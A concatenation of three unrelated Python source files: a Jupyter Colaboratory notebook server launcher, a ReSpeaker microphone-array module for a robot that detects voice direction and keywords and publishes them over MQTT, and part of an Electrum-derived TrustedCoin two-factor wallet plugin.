{'path': pjoin(RESOURCES, 'closure-library', 'closure', 'goog')}),
(r'/ipython/(.*)', FileFindHandler,
{'path': [pjoin(RESOURCES, 'ipython_patch'), DEFAULT_STATIC_FILES_PATH]}),
]
handlers.extend(load_handlers('base.handlers'))
handlers.extend(load_handlers('services.kernels.handlers'))
handlers.extend(load_handlers('services.sessions.handlers'))
return handlers
#-----------------------------------------------------------------------------
# Aliases and Flags
#-----------------------------------------------------------------------------
flags = dict(base_flags)
flags['no-browser']=(
{'ColaboratoryApp' : {'open_browser' : False}},
"Don't open the notebook in a browser after startup."
)
# Add notebook manager flags
aliases = dict(base_aliases)
aliases.update({
'ip': 'ColaboratoryApp.ip',
'port': 'ColaboratoryApp.port',
'port-retries': 'ColaboratoryApp.port_retries',
'transport': 'KernelManager.transport',
'keyfile': 'ColaboratoryApp.keyfile',
'certfile': 'ColaboratoryApp.certfile',
'browser': 'ColaboratoryApp.browser',
})
#-----------------------------------------------------------------------------
# ColaboratoryApp
#-----------------------------------------------------------------------------
class ColaboratoryApp(BaseIPythonApplication):
name = 'jupyter-colaboratory'
description = """
The Jupyter Colaboratory.
This launches a Tornado based HTML Server that can run local Jupyter
kernels while storing the notebook files in Google Drive, supporting
real-time collaborative editing of the notebooks.
"""
examples = _examples
aliases = aliases
flags = flags
classes = [
KernelManager, ProfileDir, Session, MappingKernelManager,
]
flags = Dict(flags)
aliases = Dict(aliases)
kernel_argv = List(Unicode)
_log_formatter_cls = LogFormatter
def _log_level_default(self):
return logging.INFO
def _log_datefmt_default(self):
"""Exclude date from default date format"""
return "%H:%M:%S"
# create requested profiles by default, if they don't exist:
auto_create = Bool(True)
# Network related information.
ip = Unicode('127.0.0.1', config=True,
help="The IP address the notebook server will listen on."
)
def _ip_changed(self, name, old, new):
if new == u'*': self.ip = u''
port = Integer(8844, config=True,
help="The port the notebook server will listen on."
)
port_retries = Integer(50, config=True,
help="The number of additional ports to try if the specified port is not available."
)
certfile = Unicode(u'', config=True,
help="""The full path to an SSL/TLS certificate file."""
)
keyfile = Unicode(u'', config=True,
help="""The full path to a private key file for usage with SSL/TLS."""
)
cookie_secret = Bytes(b'', config=True,
help="""The random bytes used to secure cookies.
By default this is a new random number every time you start the Notebook.
Set it to a value in a config file to enable logins to persist across server sessions.
Note: Cookie secrets should be kept private, do not share config files with
cookie_secret stored in plaintext (you can read the value from a file).
"""
)
def _cookie_secret_default(self):
return os.urandom(1024)
password = Unicode(u'', config=True,
help="""Hashed password to use for web authentication.
To generate, type in a python/IPython shell:
from IPython.lib import passwd; passwd()
The string should be of the form type:salt:hashed-password.
"""
)
open_browser = Bool(True, config=True,
help="""Whether to open in a browser after starting.
The specific browser used is platform dependent and
determined by the python standard library `webbrowser`
module, unless it is overridden using the --browser
(ColaboratoryApp.browser) configuration option.
""")
browser = Unicode(u'', config=True,
help="""Specify what command to use to invoke a web
browser when opening the notebook. If not specified, the
default browser will be determined by the `webbrowser`
standard library module, which allows setting of the
BROWSER environment variable to override it.
""")
webapp_settings = Dict(config=True,
help="Supply overrides for the tornado.web.Application that the "
"IPython notebook uses.")
jinja_environment_options = Dict(config=True,
help="Supply extra arguments that will be passed to Jinja environment.")
notebook_manager_class = DottedObjectName('IPython.html.services.notebooks.filenbmanager.FileNotebookManager',
config=True,
help='The notebook manager class to use.'
)
kernel_manager_class = DottedObjectName('IPython.html.services.kernels.kernelmanager.MappingKernelManager',
config=True,
help='The kernel manager class to use.'
)
session_manager_class = DottedObjectName('IPython.html.services.sessions.sessionmanager.SessionManager',
config=True,
help='The session manager class to use.'
)
trust_xheaders = Bool(False, config=True,
help=("Whether to trust or not X-Scheme/X-Forwarded-Proto and X-Real-Ip/X-Forwarded-For headers"
"sent by the upstream reverse proxy. Necessary if the proxy handles SSL")
)
info_file = Unicode()
def _info_file_default(self):
info_file = "nbserver-%s.json"%os.getpid()
return os.path.join(self.profile_dir.security_dir, info_file)
def init_kernel_argv(self):
"""construct the kernel arguments"""
# Kernel should get *absolute* path to profile directory
self.kernel_argv = ["--profile-dir", self.profile_dir.location]
def init_configurables(self):
# force Session default to be secure
default_secure(self.config)
kls = import_item(self.kernel_manager_class)
self.kernel_manager = kls(
parent=self, log=self.log, kernel_argv=self.kernel_argv,
connection_dir = self.profile_dir.security_dir,
)
kls = import_item(self.notebook_manager_class)
self.notebook_manager = kls(parent=self, log=self.log)
kls = import_item(self.session_manager_class)
self.session_manager = kls(parent=self, log=self.log)
def init_logging(self):
# This prevents double log messages because tornado use a root logger that
# self.log is a child of. The logging module dipatches log messages to a log
# and all of its ancenstors until propagate is set to False.
self.log.propagate = False
# hook up tornado 3's loggers to our app handlers
logger = logging.getLogger('tornado')
logger.propagate = True
logger.parent = self.log
logger.setLevel(self.log.level)
def init_webapp(self):
"""initialize tornado webapp and httpserver"""
self.web_app = ColaboratoryWebApplication(
self, self.kernel_manager, self.notebook_manager,
self.session_manager,
self.log, self.webapp_settings,
self.jinja_environment_options
)
if self.certfile:
ssl_options = dict(certfile=self.certfile)
if self.keyfile:
ssl_options['keyfile'] = self.keyfile
else:
ssl_options = None
self.web_app.password = self.password
self.http_server = httpserver.HTTPServer(self.web_app, ssl_options=ssl_options,
xheaders=self.trust_xheaders)
if not self.ip:
warning = "WARNING: The notebook server is listening on all IP addresses"
if ssl_options is None:
self.log.critical(warning + " and not using encryption. This "
"is not recommended.")
if not self.password:
self.log.critical(warning + " and not using authentication. "
"This is highly insecure and not recommended.")
success = None
for port in random_ports(self.port, self.port_retries+1):
try:
self.http_server.listen(port, self.ip)
except socket.error as e:
if e.errno == errno.EADDRINUSE:
self.log.info('The port %i is already in use, trying another random port.' % port)
continue
elif e.errno in (errno.EACCES, getattr(errno, 'WSAEACCES', errno.EACCES)):
self.log.warn("Permission to listen on port %i denied" % port)
continue
else:
raise
else:
self.port = port
success = True
break
if not success:
self.log.critical('ERROR: the notebook server could not be started because '
'no available port could be found.')
self.exit(1)
@property
def display_url(self):
ip = self.ip if self.ip else '[all ip addresses on your system]'
return self._url(ip)
@property
def connection_url(self):
ip = self.ip if self.ip else 'localhost'
return self._url(ip)
def _url(self, ip):
proto = 'https' if self.certfile else 'http'
return "%s://%s:%i" % (proto, ip, self.port)
def init_signal(self):
if not sys.platform.startswith('win'):
signal.signal(signal.SIGINT, self._handle_sigint)
signal.signal(signal.SIGTERM, self._signal_stop)
if hasattr(signal, 'SIGUSR1'):
# Windows doesn't support SIGUSR1
signal.signal(signal.SIGUSR1, self._signal_info)
if hasattr(signal, 'SIGINFO'):
# only on BSD-based systems
signal.signal(signal.SIGINFO, self._signal_info)
def _handle_sigint(self, sig, frame):
"""SIGINT handler spawns confirmation dialog"""
# register more forceful signal handler for ^C^C case
signal.signal(signal.SIGINT, self._signal_stop)
# request confirmation dialog in bg thread, to avoid
# blocking the App
thread = threading.Thread(target=self._confirm_exit)
thread.daemon = True
thread.start()
def _restore_sigint_handler(self):
"""callback for restoring original SIGINT handler"""
signal.signal(signal.SIGINT, self._handle_sigint)
def _confirm_exit(self):
"""confirm shutdown on ^C
A second ^C, or answering 'y' within 5s will cause shutdown,
otherwise original SIGINT handler will be restored.
This doesn't work on Windows.
"""
info = self.log.info
info('interrupted')
print(self.notebook_info())
sys.stdout.write("Shutdown this notebook server (y/[n])? ")
sys.stdout.flush()
r,w,x = select.select([sys.stdin], [], [], 5)
if r:
line = sys.stdin.readline()
if line.lower().startswith('y') and 'n' not in line.lower():
self.log.critical("Shutdown confirmed")
ioloop.IOLoop.instance().stop()
return
else:
print("No answer for 5s:", end=' ')
print("resuming operation...")
# no answer, or answer is no:
# set it back to original SIGINT handler
# use IOLoop.add_callback because signal.signal must be called
# from main thread
ioloop.IOLoop.instance().add_callback(self._restore_sigint_handler)
def _signal_stop(self, sig, frame):
self.log.critical("received signal %s, stopping", sig)
ioloop.IOLoop.instance().stop()
def _signal_info(self, sig, frame):
print(self.notebook_info())
def init_components(self):
"""Check the components submodule, and warn if it's unclean"""
status = submodule.check_submodule_status()
if status == 'missing':
self.log.warn("components submodule missing, running `git submodule update`")
submodule.update_submodules(submodule.ipython_parent())
elif status == 'unclean':
self.log.warn("components submodule unclean, you may see 404s on static/components")
self.log.warn("run `setup.py submodule` or `git submodule update` to update")
@catch_config_error
def initialize(self, argv=None):
super(ColaboratoryApp, self).initialize(argv)
self.init_logging()
self.init_kernel_argv()
self.init_configurables()
self.init_components()
self.init_webapp()
self.init_signal()
def cleanup_kernels(self):
"""Shutdown all kernels.
The kernels will shutdown themselves when this process no longer exists,
but explicit shutdown allows the KernelManagers to cleanup the connection files.
"""
self.log.info('Shutting down kernels')
self.kernel_manager.shutdown_all()
def notebook_info(self):
"Return the current working directory and the server url information"
info = self.notebook_manager.info_string() + "\n"
info += "%d active kernels \n" % len(self.kernel_manager._kernels)
return info + "The IPython Notebook is running at: %s" % self.display_url
def server_info(self):
"""Return a JSONable dict of information about this server."""
return {'url': self.connection_url,
'hostname': self.ip if self.ip else 'localhost',
'port': self.port,
'secure': bool(self.certfile),
}
def write_server_info_file(self):
"""Write the result of server_info() to the JSON file info_file."""
with open(self.info_file, 'w') as f:
json.dump(self.server_info(), f, indent=2)
def remove_server_info_file(self):
"""Remove the nbserver-<pid>.json file created for this server.
Ignores the error raised when the file has already been removed.
"""
try:
os.unlink(self.info_file)
except OSError as e:
if e.errno != errno.ENOENT:
raise
def start(self):
""" Start the IPython Notebook server app, after initialization
This method takes no arguments so all configuration and initialization
must be done prior to calling this method."""
if self.subapp is not None:
return self.subapp.start()
info = self.log.info
for line in self.notebook_info().split("\n"):
info(line)
info("Use Control-C to stop this server and shut down all kernels (twice to skip confirmation).")
self.write_server_info_file()
if self.open_browser:
try:
browser = webbrowser.get(self.browser or None)
except webbrowser.Error as e:
self.log.warn('No web browser found: %s.' % e)
browser = None
if browser:
b = lambda : browser.open(self.connection_url,
new=2)
threading.Thread(target=b).start()
try:
ioloop.IOLoop.instance().start()
except KeyboardInterrupt:
info("Interrupted...")
finally:
self.cleanup_kernels()
self.remove_server_info_file()
#-----------------------------------------------------------------------------
# Main entry point
#-----------------------------------------------------------------------------
launch_new_instance = ColaboratoryApp.launch_instance
|
ears.py
|
# ReSpeaker Microphone Array v2.0 Code for BinBot
# Author: Jon Gillespie
# Waterford Institute of Technology
# IOT Applications in the Robotics Lab
# EARS : Manages all listening capabilities of the BinBot, which, can determine the angle of arrival of
# a human's voice and recognise keywords.
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Two seperate threads are created:
# 1. Thread One: Angle of Voice Detection
# > Access this variable by reading the global : "ears.scaled_voice_detection_angle"
# > Publishes the angle to the mqtt cloud feed every 6th cycle
# - VAD Threshold Set : set_vad_threshold(make_code_requested_vad_threshold)
# > Sets the above thread's voice detection threshold, higher for crowded spaces is best.
# > Expects an Int (0-255) and will scale it up to 0-1000 for the Mic array.
# - VAG Get Threshold : ears.get_scaled_vad_threshold()
# > Returns the scaled version of the threshold (0-255)
# 2. Thread Two: Keyword Recognition
# > Set a new Keyword : ears.add_user_keyword(keyword)
# > Get all the Keywords : ears.get_user_keywords()
# > Determines if any Keywords have been said : "has_recognised_keyword"
# > Sends the Keyword to the Cloud via MQTT upon recognition
#
# MAKECODE Note
# > Must scale up the voice detection angle to 0-360 from 0-255 to present the user with accurate angles
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
import speech_recognition as sr
import threading
import logging
import time
import usb.util
import usb.core
from .tuning import Tuning
from pi_monitoring_scripts.pub_data import publish
print("EARS | Loading Ears.py Script")
""" User's Keywords for Keyword Recognition """
# Format: ("word", threshold) ... threshold is between 0 and 1. Closer to 0 is more false positives.
user_keywords = [("binbot", 1.0), ("rubbish", 1.0)]
has_recognised_keyword = False
""" Global Variables used by the Mic Array """
vad_threshold = 300
""" Public Global Variables set by the Mic Array thread and available to reference publicly """
# Referenced by Controller (pi_hub.py) >> Ensure used within a polling loop or framework
voice_detection_angle_to_360 = 0
scaled_voice_detection_angle_to_255 = 0
scaled_vad_threshold_to_255 = vad_threshold / 1000 * 255
""" Private Global Variables """
vad_range_max = 1000 # Limit Set by MicArray Tuning
mqtt_topic_mic_angle = "micAngleArrival"
mqtt_topic_keyword = "micKeyword"
""" Initialisation of the Mic Array """
# Find the ReSpeaker in the list of devices connected.
dev = usb.core.find(idVendor=0x2886, idProduct=0x0018)
# Loop until ReSpeaker is found - unlikely but for insurance.
while not dev:
print("EARS | Setting Up | Looking for Mic Array")
dev = usb.core.find(idVendor=0x2886, idProduct=0x0018)
if dev:
print("EARS | Setting Up | Found Mic Array")
Mic_tuning = Tuning(dev)
# Mic_tuning.set_HPFONOFF(3) # For the CLI as param
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# VOICE DETECTION ANGLE
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def get_scaled_voice_detection_angle():
""" Public: Returns the angle of voice detection scaled down to fit in a byte length.
Must be scaled back 'up' to 360 max to represent correct angles """
return scaled_voice_detection_angle_to_255
def _run_voice_detection_angle():
""" Private: create a thread to poll the Mic Array and set the DOA Global Variable """
print("EARS | Voice Detection | Voice Detection Loop Starting")
print("EARS | Voice Detection | VAD: ", vad_threshold)
# Counter to implement simple trigger for publishing to mqtt
mqtt_trigger_counter = 0
# Mic_tuning.set_vad_threshold(vad_threshold)
# Continue this block until the flag is raised to stop the thread - or the user interrupts
while True:
global _is_direction_of_arrival_stop_thread_flag
global voice_detection_angle_to_360
global Mic_tuning
try:
# Read the voice detected bool from the Mic tuninig script / hardware
is_voice_detected = Mic_tuning.is_voice()
if is_voice_detected:
# Set the 0-360 degree var for direction of arrival
voice_detection_angle_to_360 = Mic_tuning.direction
print("EARS | Voice Detection | Direction of Arrival: ",
voice_detection_angle_to_360)
# Convert the angle to the byte size scale (0-360 to 0-255)
global scaled_voice_detection_angle_to_255
scaled_voice_detection_angle_to_255 = int(voice_detection_angle_to_360 / 360 * 255)
# Briefly sleep to prevent unecessary runaway
time.sleep(0.3)
# Simple Trigger to Publish the DOA every 6th loop (0.3 * 6) ~1.8 seconds
mqtt_trigger_counter += 1
if mqtt_trigger_counter == 6:
# Publish the angle of arrival to the cloud via mqtt
publish(mqtt_topic_mic_angle, {
"mic_direction_of_arrival": voice_detection_angle_to_360
})
# Once published, reset the trigger
mqtt_trigger_counter = 0
except KeyboardInterrupt:
break
if _is_direction_of_arrival_stop_thread_flag:
print("Direction of Arrival Thread told to stop.")
break
def get_vad_threshold():
""" Public: Returns the voice detection threshold value (to 1000)"""
return vad_threshold
def get_scaled_vad_threshold():
""" Public: Returns the scaled voice detection threshold value (to 255) """
return scaled_vad_threshold_to_255
def set_vad_threshold(make_code_requested_vad_threshold):
""" Public: Re-set the VAD threshold """
# NOTE: The VAD is accesible via custom function Jon wrote within tuning.py
# print("" + Mic_tuning.get_VAD())
# Confirm parameter is an int
if isinstance(make_code_requested_vad_threshold, int):
# Ensure parameter is within range
# TODO find out what the range is.
if 0 <= make_code_requested_vad_threshold <= 255:
# Set scaled threshold
global vad_threshold
vad_threshold = int(make_code_requested_vad_threshold / 255 * 1000)
global scaled_vad_threshold_to_255
scaled_vad_threshold_to_255 = make_code_requested_vad_threshold
print("EARS | Voice Detection | VAD: ", vad_threshold)
else:
print("EARS | Voice Detection | ERROR: make_code_requested_vad_threshold - parameter is not within range")
else:
print("EARS | Voice Detection | ERROR: make_code_requested_vad_threshold - parameter is not an Int")
""" Private: Set the target for the direction_of_arrival Thread """
_direction_of_arrival_thread = threading.Thread(
target=_run_voice_detection_angle, daemon=True)
def start_direction_of_arrival_thread():
""" Public: Start the Direction of Arrival Thread """
global _is_direction_of_arrival_stop_thread_flag
_is_direction_of_arrival_stop_thread_flag = False
print("EARS | Voice Detection | Starting Direction of Arrival Thread")
# Create a new thread without any parameters (args)
# global doa_thread
_direction_of_arrival_thread.start()
def stop_direction_of_arrival_thread():
""" Public: Stop the Direction of Arrival Thread """
print("EARS | Voice Detection | Stopping Direction of Arrival Thread")
global _is_direction_of_arrival_stop_thread_flag
_is_direction_of_arrival_stop_thread_flag = True
global _direction_of_arrival_thread
_direction_of_arrival_thread.join()
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# KEYWORD RECOGNITION
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def get_user_keywords():
""" Public: Returns all of the Keywords that the Bot is listening for """
return user_keywords
def add_user_keyword(keyword):
""" Public: Permits user to add a new word to the keywords list.
Saved only during runtime - ephemeral """
# Confirms the keyword is a string
if isinstance(keyword, str):
# Creates the keyword tuple and appends it to the list
pair = (keyword, 1.0)
user_keywords.append(pair)
print("EARS | Keyword Recognition | New Keyword Added: ", keyword)
print("EARS | Keyword Recognition | All User Keywords are: ", user_keywords)
def _keyword_recognition():
""" Private: Main Keyword Recognition Thread Logic """
r = sr.Recognizer()
m = sr.Microphone()
# Continue this block until the flag is raised to stop the thread
while True:
global _is_keyword_recognition_stop_thread_flag
try:
print("EARS | Keyword Recognition | Starting Up...")
# Speech Recognition - ambient noise filter (send mic into it)
with m as source:
r.adjust_for_ambient_noise(source)
print("EARS | Keyword Recognition | Set minimum energy threshold to {}".format(
r.energy_threshold))
# Main thread loop - listens for voices, checks against keywords and provides result...
while True:
print("EARS | Keyword Recognition | Ready and Listening...")
with m as source:
audio = r.listen(source)
print(
"EARS | Keyword Recognition | Voices detected >>> processing for keywords...")
try:
global user_keywords
# Sphinx Keyword Recognition (on-board)
sphinx_value = r.recognize_sphinx(
audio, keyword_entries=user_keywords)
print(
"EARS | Keyword Recognition | * * KEYWORD RECOGNISED * * Sphinx Found: \" {}\"".format(sphinx_value))
# Google Keyword Recognition
# google_value = r.recognize_google(audio, keyword_entries=user_keywords)
# print("EARS | Keyword Recognition | * * KEYWORD RECOGNISED * * Google Found: {}".format(sphinx_value))
global has_recognised_keyword
has_recognised_keyword = True
# In the case of multi match: "BinBot, BinBot, BinBot" we only want to send the first instance of the sentence
single_keyword_method = sphinx_value.split()
# Publish the Keyword to the MQTT Broker (event based)
publish(mqtt_topic_keyword, { "mic_keyword": single_keyword_method[0] })
except sr.UnknownValueError:
print(
"EARS | Keyword Recognition | *EXCEPTION* Unknown Value Heard...")
except sr.RequestError as e:
print(
"EARS | Keyword Recognition | *EXCEPTION* Couldn't request results from Google Keyword Recognition service; {0}".format(e))
if _is_keyword_recognition_stop_thread_flag:
print("Keyword Recognition Thread told to stop.(1)")
break
except Exception:
pass
if _is_keyword_recognition_stop_thread_flag:
print("Keyword Recognition Thread told to stop.(2)")
break
""" Private: Set the target for the Keyword Recognition Thread """
_keyword_recognition_thread = threading.Thread(
target=_keyword_recognition, daemon=True)
def start_keyword_recognition_thread():
""" Public: Start up the Keyword Recognition Thread """
print("EARS | Keyword Recognition | Starting Keyword Recognition Thread")
global _is_keyword_recognition_stop_thread_flag
_is_keyword_recognition_stop_thread_flag = False
# Create a new thread without any parameters (args)
# global _keyword_recognition
_keyword_recognition_thread.start()
def stop_keyword_recognition_thread():
""" Public: Stop the Keyword Recognition Thread """
print("EARS | Keyword Recognition | Stopping Keyword Recognition Thread")
global has_recognised_keyword
has_recognised_keyword = False
global _is_keyword_recognition_stop_thread_flag
_is_keyword_recognition_stop_thread_flag = True
global _keyword_recognition_thread
_keyword_recognition_thread.join()
|
trustedcoin.py
|
#!/usr/bin/env python
#
# Electrum - Lightweight Avian Client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import socket
import json
import base64
import time
import hashlib
from collections import defaultdict
from typing import Dict, Union, Sequence, List
from urllib.parse import urljoin
from urllib.parse import quote
from aiohttp import ClientResponse
from electrum import ecc, constants, keystore, version, bip32, avian
from electrum.bip32 import BIP32Node, xpub_type
from electrum.crypto import sha256
from electrum.transaction import PartialTxOutput, PartialTxInput, PartialTransaction, Transaction
from electrum.mnemonic import Mnemonic, seed_type, is_any_2fa_seed_type
from electrum.wallet import Multisig_Wallet, Deterministic_Wallet
from electrum.i18n import _
from electrum.plugin import BasePlugin, hook
from electrum.util import NotEnoughFunds, UserFacingException
from electrum.storage import StorageEncryptionVersion
from electrum.network import Network
from electrum.base_wizard import BaseWizard, WizardWalletPasswordSetting
from electrum.logging import Logger
def get_signing_xpub(xtype):
if not constants.net.TESTNET:
xpub = "xpub661MyMwAqRbcGnMkaTx2594P9EDuiEqMq25PM2aeG6UmwzaohgA6uDmNsvSUV8ubqwA3Wpste1hg69XHgjUuCD5HLcEp2QPzyV1HMrPppsL"
else:
xpub = "tpubD6NzVbkrYhZ4XdmyJQcCPjQfg6RXVUzGFhPjZ7uvRC8JLcS7Hw1i7UTpyhp9grHpak4TyK2hzBJrujDVLXQ6qB5tNpVx9rC6ixijUXadnmY"
if xtype not in ('standard', 'p2wsh'):
raise NotImplementedError('xtype: {}'.format(xtype))
if xtype == 'standard':
return xpub
node = BIP32Node.from_xkey(xpub)
return node._replace(xtype=xtype).to_xpub()
def get_billing_xpub():
if constants.net.TESTNET:
return "tpubD6NzVbkrYhZ4X11EJFTJujsYbUmVASAYY7gXsEt4sL97AMBdypiH1E9ZVTpdXXEy3Kj9Eqd1UkxdGtvDt5z23DKsh6211CfNJo8bLLyem5r"
else:
return "xpub6DTBdtBB8qUmH5c77v8qVGVoYk7WjJNpGvutqjLasNG1mbux6KsojaLrYf2sRhXAVU4NaFuHhbD9SvVPRt1MB1MaMooRuhHcAZH1yhQ1qDU"
DISCLAIMER = [
_("Two-factor authentication is a service provided by TrustedCoin. "
"It uses a multi-signature wallet, where you own 2 of 3 keys. "
"The third key is stored on a remote server that signs transactions on "
"your behalf. To use this service, you will need a smartphone with "
"Google Authenticator installed."),
_("A small fee will be charged on each transaction that uses the "
"remote server. You may check and modify your billing preferences "
"once the installation is complete."),
_("Note that your coins are not locked in this service. You may withdraw "
"your funds at any time and at no cost, without the remote server, by "
"using the 'restore wallet' option with your wallet seed."),
_("The next step will generate the seed of your wallet. This seed will "
"NOT be saved in your computer, and it must be stored on paper. "
"To be safe from malware, you may want to do this on an offline "
"computer, and move your wallet later to an online computer."),
]
KIVY_DISCLAIMER = [
_("Two-factor authentication is a service provided by TrustedCoin. "
"To use it, you must have a separate device with Google Authenticator."),
_("This service uses a multi-signature wallet, where you own 2 of 3 keys. "
"The third key is stored on a remote server that signs transactions on "
"your behalf. A small fee will be charged on each transaction that uses the "
"remote server."),
_("Note that your coins are not locked in this service. You may withdraw "
"your funds at any time and at no cost, without the remote server, by "
"using the 'restore wallet' option with your wallet seed."),
]
RESTORE_MSG = _("Enter the seed for your 2-factor wallet:")
class TrustedCoinException(Exception):
def __init__(self, message, status_code=0):
Exception.__init__(self, message)
self.status_code = status_code
class ErrorConnectingServer(Exception):
def __init__(self, reason: Union[str, Exception] = None):
self.reason = reason
def __str__(self):
header = _("Error connecting to {} server").format('TrustedCoin')
reason = self.reason
if isinstance(reason, BaseException):
reason = repr(reason)
return f"{header}:\n{reason}" if reason else header
class TrustedCoinCosignerClient(Logger):
def __init__(self, user_agent=None, base_url='https://api.trustedcoin.com/2/'):
self.base_url = base_url
self.debug = False
self.user_agent = user_agent
Logger.__init__(self)
async def handle_response(self, resp: ClientResponse):
if resp.status != 200:
try:
r = await resp.json()
message = r['message']
except:
message = await resp.text()
raise TrustedCoinException(message, resp.status)
try:
return await resp.json()
except:
return await resp.text()
def send_request(self, method, relative_url, data=None, *, timeout=None):
network = Network.get_instance()
if not network:
raise ErrorConnectingServer('You are offline.')
url = urljoin(self.base_url, relative_url)
if self.debug:
self.logger.debug(f'<-- {method} {url} {data}')
headers = {}
if self.user_agent:
headers['user-agent'] = self.user_agent
try:
if method == 'get':
response = Network.send_http_on_proxy(method, url,
params=data,
headers=headers,
on_finish=self.handle_response,
timeout=timeout)
elif method == 'post':
response = Network.send_http_on_proxy(method, url,
json=data,
headers=headers,
on_finish=self.handle_response,
timeout=timeout)
else:
assert False
except TrustedCoinException:
raise
except Exception as e:
raise ErrorConnectingServer(e)
else:
if self.debug:
self.logger.debug(f'--> {response}')
return response
def get_terms_of_service(self, billing_plan='electrum-per-tx-otp'):
"""
Returns the TOS for the given billing plan as a plain/text unicode string.
:param billing_plan: the plan to return the terms for
"""
payload = {'billing_plan': billing_plan}
return self.send_request('get', 'tos', payload)
def create(self, xpubkey1, xpubkey2, email, billing_plan='electrum-per-tx-otp'):
"""
Creates a new cosigner resource.
:param xpubkey1: a bip32 extended public key (customarily the hot key)
:param xpubkey2: a bip32 extended public key (customarily the cold key)
:param email: a contact email
:param billing_plan: the billing plan for the cosigner
"""
payload = {
'email': email,
'xpubkey1': xpubkey1,
'xpubkey2': xpubkey2,
'billing_plan': billing_plan,
}
return self.send_request('post', 'cosigner', payload)
def auth(self, id, otp):
"""
Attempt to authenticate for a particular cosigner.
:param id: the id of the cosigner
:param otp: the one time password
"""
payload = {'otp': otp}
return self.send_request('post', 'cosigner/%s/auth' % quote(id), payload)
def get(self, id):
""" Get billing info """
return self.send_request('get', 'cosigner/%s' % quote(id))
def get_challenge(self, id):
""" Get challenge to reset Google Auth secret """
return self.send_request('get', 'cosigner/%s/otp_secret' % quote(id))
def reset_auth(self, id, challenge, signatures):
""" Reset Google Auth secret """
payload = {'challenge':challenge, 'signatures':signatures}
return self.send_request('post', 'cosigner/%s/otp_secret' % quote(id), payload)
def sign(self, id, transaction, otp):
"""
Attempt to authenticate for a particular cosigner.
:param id: the id of the cosigner
:param transaction: the hex encoded [partially signed] compact transaction to sign
:param otp: the one time password
"""
payload = {
'otp': otp,
'transaction': transaction
}
return self.send_request('post', 'cosigner/%s/sign' % quote(id), payload,
timeout=60)
def transfer_credit(self, id, recipient, otp, signature_callback):
"""
Transfer a cosigner's credits to another cosigner.
:param id: the id of the sending cosigner
:param recipient: the id of the recipient cosigner
:param otp: the one time password (of the sender)
:param signature_callback: a callback that signs a text message using xpubkey1/0/0 returning a compact sig
"""
payload = {
'otp': otp,
'recipient': recipient,
'timestamp': int(time.time()),
}
relative_url = 'cosigner/%s/transfer' % quote(id)
full_url = urljoin(self.base_url, relative_url)
headers = {
'x-signature': signature_callback(full_url + '\n' + json.dumps(payload))
}
return self.send_request('post', relative_url, payload, headers)
server = TrustedCoinCosignerClient(user_agent="Electrum/" + version.ELECTRUM_VERSION)
class Wallet_2fa(Multisig_Wallet):
plugin: 'TrustedCoinPlugin'
wallet_type = '2fa'
def __init__(self, db, storage, *, config):
self.m, self.n = 2, 3
Deterministic_Wallet.__init__(self, db, storage, config=config)
self.is_billing = False
self.billing_info = None
self._load_billing_addresses()
def _load_billing_addresses(self):
billing_addresses = {
'legacy': self.db.get('trustedcoin_billing_addresses', {}),
'segwit': self.db.get('trustedcoin_billing_addresses_segwit', {})
}
self._billing_addresses = {} # type: Dict[str, Dict[int, str]] # addr_type -> index -> addr
self._billing_addresses_set = set() # set of addrs
for addr_type, d in list(billing_addresses.items()):
self._billing_addresses[addr_type] = {}
# convert keys from str to int
for index, addr in d.items():
self._billing_addresses[addr_type][int(index)] = addr
self._billing_addresses_set.add(addr)
def can_sign_without_server(self):
return not self.keystores['x2/'].is_watching_only()
def get_user_id(self):
return get_user_id(self.db)
def min_prepay(self):
return min(self.price_per_tx.keys())
def num_prepay(self):
default = self.min_prepay()
n = self.config.get('trustedcoin_prepay', default)
if n not in self.price_per_tx:
n = default
return n
def extra_fee(self):
if self.can_sign_without_server():
return 0
if self.billing_info is None:
self.plugin.start_request_thread(self)
return 0
if self.billing_info.get('tx_remaining'):
return 0
if self.is_billing:
return 0
n = self.num_prepay()
price = int(self.price_per_tx[n])
if price > 100000 * n:
raise Exception('too high trustedcoin fee ({} for {} txns)'.format(price, n))
return price
def make_unsigned_transaction(
self, *,
coins: Sequence[PartialTxInput],
outputs: List[PartialTxOutput],
fee=None,
change_addr: str = None,
is_sweep=False,
rbf=False) -> PartialTransaction:
mk_tx = lambda o: Multisig_Wallet.make_unsigned_transaction(
self, coins=coins, outputs=o, fee=fee, change_addr=change_addr, rbf=rbf)
extra_fee = self.extra_fee() if not is_sweep else 0
if extra_fee:
address = self.billing_info['billing_address_segwit']
fee_output = PartialTxOutput.from_address_and_value(address, extra_fee)
try:
tx = mk_tx(outputs + [fee_output])
except NotEnoughFunds:
# TrustedCoin won't charge if the total inputs is
# lower than their fee
tx = mk_tx(outputs)
if tx.input_value() >= extra_fee:
raise
self.logger.info("not charging for this tx")
else:
tx = mk_tx(outputs)
return tx
